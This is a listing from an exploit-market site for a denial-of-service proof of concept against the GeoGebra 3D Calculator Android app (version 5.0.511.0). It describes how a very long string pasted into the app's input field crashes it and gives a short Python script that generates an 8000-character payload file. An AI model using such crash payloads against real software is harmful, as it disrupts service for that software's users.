[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

GeoGebra 3D Calculator 5.0.511.0 - Denial of Service Exploit

Author
Brian Rodriguez
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-35962
Category
dos / poc
Date add
16-03-2021
Platform
Android
# Exploit Title: GeoGebra 3D Calculator 5.0.511.0 - Denial of Service (PoC)
# Author: Brian Rodríguez
# Software Site: https://www.geogebra.org/download
# Download Link: https://play.google.com/store/apps/details?id=org.geogebra.android.g3d&utm_source=Download+page&utm_medium=Website&utm_campaign=3D+Calculator+for+Android
# Version: 5.0.511.0
# Category: DoS (Android)

##### Vulnerability #####

Graficador GeoGebra 3D is vulnerable to a DoS condition when a long list of characters is being used in field "Entrada..." text box.

Successful exploitation will causes application stop working.

I have been able to test this exploit against Android 10.0.

##### PoC #####

#!/usr/bin/env python
buffer = "\x41" * 8000

try:
    f = open("payload.txt","w")
    f.write(buffer)
    f.close()
    print ("File created")
except:
    print ("File cannot be created")

#  0day.today [2024-11-14]  #